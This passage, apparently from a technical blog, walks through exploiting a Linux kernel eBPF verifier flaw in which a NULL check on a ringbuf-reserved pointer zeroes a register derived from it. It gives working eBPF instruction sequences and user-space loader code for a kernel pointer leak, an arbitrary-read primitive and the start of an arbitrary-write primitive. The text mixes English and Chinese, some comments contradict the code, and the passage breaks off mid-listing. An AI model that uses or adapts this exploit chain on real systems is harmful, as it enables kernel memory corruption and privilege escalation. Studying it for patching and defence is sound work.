<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">check_cond_jmp_op</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn, <span class="keyword">int</span> *insn_idx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* detect if R == 0 where R is returned from bpf_map_lookup_elem().</span></span><br><span class="line"><span class="comment"> * <span class="doctag">NOTE:</span> these optimizations below are related with pointer comparison</span></span><br><span class="line"><span class="comment"> * which will never be JMP32.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">if</span> (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&</span><br><span class="line"> insn->imm == <span class="number">0</span> && (opcode == BPF_JEQ || opcode == BPF_JNE) 
&&</span><br><span class="line"> reg_type_may_be_null(dst_reg->type)) {</span><br><span class="line"> <span class="comment">/* Mark all identical registers in each branch as either</span></span><br><span class="line"><span class="comment"> * safe or unknown depending R == 0 or R != 0 conditional.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> mark_ptr_or_null_regs(this_branch, insn->dst_reg,</span><br><span class="line"> opcode == BPF_JNE);</span><br><span class="line"> mark_ptr_or_null_regs(other_branch, insn->dst_reg,</span><br><span class="line"> opcode == BPF_JEQ);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
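<p>mark_ptr_or_null_regs calls __mark_ptr_or_null_regs, which applies mark_ptr_or_null_reg to every register with the same id. Consequently r1 also becomes a SCALAR_VALUE, and the verifier believes its value is 0, even though r1 actually holds 1. This is the vulnerability. However a PTR_TO_MEM_OR_NULL pointer has been changed by arithmetic, once a register sharing its id is checked against NULL, the verifier assumes it is 0 in one of the branches.</p>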
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">void</span> __mark_ptr_or_null_regs(struct bpf_func_state *state, u32 id,</span><br><span class="line"> <span class="keyword">bool</span> is_null)</span><br><span class="line">{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < MAX_BPF_REG; i++)</span><br><span class="line"> mark_ptr_or_null_reg(state, &state->regs[i], id, is_null);</span><br><span class="line"></span><br><span class="line"> ...</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">mark_ptr_or_null_reg</span><span class="params">(struct bpf_func_state *state,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_reg_state 
*reg, u32 id,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">bool</span> is_null)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (WARN_ON_ONCE(reg->smin_value || reg->smax_value ||</span><br><span class="line"> !tnum_equals_const(reg->var_off, <span class="number">0</span>) ||</span><br><span class="line"> reg->off)) {</span><br><span class="line"> __mark_reg_known_zero(reg);</span><br><span class="line"> reg->off = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (is_null) {</span><br><span class="line"> reg->type = SCALAR_VALUE;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
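<p>A toy model of the verifier's register state reproduces the effect of the shared id. The sketch below is heavily simplified and hypothetical: the struct and function names are not kernel APIs. It tracks only type, id and offset, and replays the instruction sequence above. It then compares the value the verifier believes r1 holds with the value r1 actually holds at run time.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical, heavily simplified verifier register state. */
enum reg_type { SCALAR_VALUE, PTR_TO_MEM_OR_NULL };

struct reg_state {
    enum reg_type type;
    uint32_t id;    /* shared by registers derived from the same pointer */
    int64_t off;    /* constant offset tracked for pointers */
    int64_t known;  /* known value once the register is a scalar */
};

#define NREGS 11    /* r0 .. r10 */

/* ptr += imm: type and id are inherited, only the offset changes
 * (cf. adjust_ptr_min_max_vals). */
static void ptr_add_imm(struct reg_state *reg, int64_t imm)
{
    reg->off += imm;
}

/* Branch where the checked register == 0: every register sharing its id
 * becomes a known-zero scalar, whatever its offset was
 * (cf. mark_ptr_or_null_reg with is_null == true). */
static void mark_null_branch(struct reg_state *regs, int checked)
{
    uint32_t id = regs[checked].id;

    assert(id != 0);
    for (int i = 0; i < NREGS; i++) {
        if (regs[i].type == PTR_TO_MEM_OR_NULL && regs[i].id == id) {
            regs[i].type = SCALAR_VALUE;
            regs[i].off = 0;
            regs[i].known = 0;
        }
    }
}

/* Replays: r0 = ringbuf_reserve(); r1 = r0; r1 += 1; if (r0 == 0) ... */
void model_null_check_bug(int64_t *believed_r1, int64_t *actual_r1)
{
    struct reg_state regs[NREGS] = {0};
    int64_t actual[NREGS] = {0};

    /* The reservation always fails at run time, so r0 really is NULL. */
    regs[0] = (struct reg_state){ PTR_TO_MEM_OR_NULL, 1, 0, 0 };
    actual[0] = 0;

    regs[1] = regs[0];          /* r1 = r0: same type, same id */
    actual[1] = actual[0];

    ptr_add_imm(&regs[1], 1);   /* r1 += 1: not rejected for this type */
    actual[1] += 1;

    mark_null_branch(regs, 0);  /* follow the r0 == NULL branch */

    *believed_r1 = regs[1].known;
    *actual_r1 = actual[1];
}
```

<p>In this model r1 has a believed value of 0 and an actual value of 1, which is the discrepancy described above. Every later value computed from r1 inherits it.</p>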
<p>Next, store r1 + 8 in r7. The verifier believes r7 is 8, but r7 is actually 9. Then store the array pointer r8 plus 0xE0 at r10-8. The 0xE0 is added so that more data is leaked, as explained later.</p>
<p><img src="images/01.jpg" alt></p>
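<p>Then call bpf_skb_load_bytes_relative to write r7 bytes, i.e. 9 bytes, starting at r10-16. The verifier accepts the call because it believes only 8 bytes are written, exactly filling r10-16 to r10-9. The real write therefore overflows by 1 byte into the slot at r10-8. The written data is controllable: user space supplies it by writing to the socket. Here the data is chosen to be all zeros, so the byte at r10-8 is overwritten with 0x00. On little-endian x86-64, that byte is the least significant byte of the spilled pointer.</p>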
<p><img src="images/02.jpg" alt></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r7 = r1 + 8</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_7, BPF_REG_1)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">8</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// r6 = r8 - 0xE0</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_6, BPF_REG_8)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, <span class="number">0xE0</span>)</span><br><span class="line"><span class="comment">// *(u64 *)(r10 - 8) = r6</span></span><br><span class="line">BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, <span class="number">-8</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 这里会将r10-16后r7个字节置零。</span></span><br><span class="line"><span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, 0)</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_9)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_3, BPF_REG_10)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_4, BPF_REG_7)</span><br><span 
class="line">BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative)</span><br></pre></td></tr></table></figure>
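<p>Load the spilled array pointer back from the stack and subtract 0xE0 to match the earlier addition, storing the result in r6. Because the addition and subtraction cancel out, the verifier believes r6 is still the array pointer, i.e. 0xFFFF…10. In reality the low byte of the spilled value was zeroed, so r6 equals 0xFFFF…00 - 0xE0, that is 0xFFFF…10 - 0xF0. Any offset from 0x10 to 0xE0 can be used here. 0xE0 moves the start of the window furthest down and therefore leaks the most data. Next, the PAGE_SIZE bytes that r6 points to are copied into the array map value, which leaks them. Debugging shows that the leaked data contains the array pointer at 0xFFFF…10 - 0x50.</p>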
<p><img src="images/03.jpg" alt></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r6 = *(u64 *)(r10 - 8) - 0xE0</span></span><br><span class="line">BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>)</span><br><span class="line">BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, <span class="number">0xE0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将r6所指向的4096字节数据写入array map,实现信息泄露。</span></span><br><span class="line"><span class="comment">// 调试发现,r6+0xa0处为array map的地址。</span></span><br><span class="line"><span class="comment">// map_update_elem(ctx->comm_fd, 0, r6, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_2, BPF_REG_8)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_3, BPF_REG_6)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_4, <span class="number">0</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_update_elem)</span><br></pre></td></tr></table></figure>
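<p>Once the program is built, load it into the kernel and attach it to a socket. Then write all-zero data to the socket so that the low byte of the array pointer spilled on the stack is overwritten. Finally, read the leaked data back from the array map and extract the array pointer from it.</p>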
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, <span class="keyword">sizeof</span>(insn) / <span 
class="keyword">sizeof</span>(insn[<span class="number">0</span>]), <span class="string">""</span>);</span><br><span class="line"><span class="keyword">if</span> (prog < <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not load program(do_leak):\n %s"</span>, bpf_log_buf);</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> err = bpf_prog_skb_run(prog, ctx->bytes, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (err != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not run program(do_leak): %d (%s)"</span>, err, strerror(err));</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> key = <span class="number">0</span>;</span><br><span class="line">err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);</span><br><span class="line"><span class="keyword">if</span> (err != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not lookup comm map: %d (%s)"</span>, err, strerror(err));</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">u64 array_map = (u64)ctx->ptrs[<span class="number">20</span>] & (~<span class="number">0xFF</span>L);</span><br><span class="line"><span class="keyword">if</span> ((array_map&<span class="number">0xFFFFF00000000000</span>) != <span class="number">0xFFFF800000000000</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not leak array 
map: got %p"</span>, (<span class="keyword">kaddr_t</span>)array_map);</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> __always_inline <span class="keyword">int</span></span><br><span class="line">bpf_prog_skb_run(<span class="keyword">int</span> prog_fd, <span class="keyword">const</span> <span class="keyword">void</span> *data, <span class="keyword">size_t</span> <span class="built_in">size</span>)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">int</span> err, socks[<span class="number">2</span>] = {};</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (socketpair(AF_UNIX, SOCK_DGRAM, <span class="number">0</span>, socks) != <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">return</span> errno;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (setsockopt(socks[<span class="number">0</span>], SOL_SOCKET, SO_ATTACH_BPF,</span><br><span class="line"> &prog_fd, <span class="keyword">sizeof</span>(prog_fd)) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> err = errno;</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">write</span>(socks[<span class="number">1</span>], data, <span class="built_in">size</span>) != <span class="built_in">size</span>)</span><br><span class="line"> {</span><br><span class="line"> err = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line"> }</span><br><span 
class="line"></span><br><span class="line"> err = <span class="number">0</span>;</span><br><span class="line"> </span><br><span class="line"><span class="built_in">abort</span>:</span><br><span class="line"> <span class="built_in">close</span>(socks[<span class="number">0</span>]);</span><br><span class="line"> <span class="built_in">close</span>(socks[<span class="number">1</span>]);</span><br><span class="line"> <span class="keyword">return</span> err;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="4-3-构造任意读、写原语"><a href="#4-3-构造任意读、写原语" class="headerlink" title="4.3 构造任意读、写原语"></a>4.3 构造任意读、写原语</h3><p>接下来构造的 eBPF 程序和上一程序及其类似,因此通过添加注释的方式进行说明。</p>
<p>实现任意读原语的 eBPF 程序:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bpf_insn</span> <span class="title">arbitrary_read</span>[] = {</span></span><br><span class="line"> <span class="comment">// Save r1: the kernel initializes r1 to point to the skb.</span></span><br><span class="line"> <span class="comment">// r9 = r1</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Look up the array value; r0 has type PTR_TO_MAP_VALUE_OR_NULL.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_map_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),</span><br><span class="line"> BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem),</span><br><span
class="line"> </span><br><span class="line"> <span class="comment">// Required NULL check: on the r0 != NULL path the verifier turns r0 into PTR_TO_MAP_VALUE.</span></span><br><span class="line"> <span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Save the array value pointer in r8.</span></span><br><span class="line"> <span class="comment">// r8 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Obtain a PTR_TO_MEM_OR_NULL pointer in r0.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Copy the PTR_TO_MEM_OR_NULL pointer into r1.</span></span><br><span class="line"> <span class="comment">// r1 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> <span class="comment">// r1 = r1 + 1</span></span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>),</span><br><span
class="line"></span><br><span class="line"> <span class="comment">// Never taken: the ringbuf data area is PAGE_SIZE bytes, but each record also needs an 8-byte header,</span></span><br><span class="line"> <span class="comment">// so a PAGE_SIZE reservation always fails and r0 is NULL at runtime.</span></span><br><span class="line"> <span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// After the NULL check above, the verifier believes r0 == 0.</span></span><br><span class="line"> <span class="comment">// Because r1 was derived from r0, the verifier also believes r1 == 0, but at runtime r1 == 1.</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// r7 = (r1 + 1) * 8</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">1</span>),</span><br><span class="line"> BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, <span class="number">8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// The verifier believes r7 == 8, but at runtime r7 == 16.</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// While debugging, the array pointer always had the form 0xFFFF..........10.</span></span><br><span class="line"> <span class="comment">// Spill this pointer to r10-8.</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r10 - 8) = r8</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, <span class="number">-8</span>),</span><br><span
class="line"></span><br><span class="line"> <span class="comment">// The verifier checks an 8-byte write, but r7 = 16 bytes are written to r10-16, overwriting the array pointer at r10-8.</span></span><br><span class="line"> <span class="comment">// The bytes come from the packet and are attacker-controlled, so the pointer can be replaced with any address.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, BPF_HDR_START_NET)</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Reload the overwritten pointer.</span></span><br><span class="line"> <span class="comment">// r6 = *(u64 *)(r10 - 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Read 8 bytes from the forged pointer: this is the arbitrary read.</span></span><br><span class="line"> <span class="comment">// The load is accepted because the verifier still treats the pointer as the array pointer.</span></span><br><span class="line"> <span class="comment">// r0 = *(u64 *)(r6 + 0)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, <span class="number">0</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Store the value in the array map to pass it back to user space.</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r8 + 0) = r0</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, <span class="number">0</span>),</span><br><span 
class="line"></span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">0</span>),</span><br><span class="line"> BPF_EXIT_INSN()</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
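<p>Both programs depend on the gap between what the verifier tracks and what happens at runtime. The sketch below reproduces only that arithmetic and the stack spill in plain C. It assumes a toy 512-byte array stands in for the eBPF stack frame, with its top playing the role of r10. <code>copy_len</code> and <code>replay_spill_overwrite</code> are hypothetical names chosen for illustration and are not part of the exploit.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define STACK_SIZE 512 /* size of an eBPF program's stack frame */

/* r7 = (r1 + 1) * 8, exactly as both eBPF programs compute it. */
uint64_t copy_len(uint64_t r1)
{
    return (r1 + 1) * 8;
}

/*
 * Replays the stack manipulation on a toy stack whose top plays the role of r10:
 *   *(u64 *)(r10 - 8) = array_ptr;                spill the array pointer
 *   copy copy_len(r1) packet bytes to r10 - 16;   bpf_skb_load_bytes_relative
 *   return *(u64 *)(r10 - 8);                     what ends up in r6
 */
uint64_t replay_spill_overwrite(uint64_t array_ptr, const uint8_t packet[16], uint64_t r1)
{
    uint8_t stack[STACK_SIZE] = {0};
    uint8_t *r10 = stack + STACK_SIZE;
    uint64_t len = copy_len(r1);
    uint64_t r6;

    assert(len <= 16); /* the toy packet holds only 16 bytes */
    memcpy(r10 - 8, &array_ptr, sizeof(array_ptr));
    memcpy(r10 - 16, packet, (size_t)len);
    memcpy(&r6, r10 - 8, sizeof(r6));
    return r6;
}
```

<p>If r1 has the value the verifier assumes (<code>r1 = 0</code>), only the 8 bytes at r10-16 are written and r6 reloads the original pointer. If r1 has its real runtime value (<code>r1 = 1</code>), the second 8 packet bytes replace the spilled pointer.</p>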
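<p>The eBPF program implementing the arbitrary-write primitive is identical to the read program up to the point where the forged pointer is reloaded into r6:</p>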
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
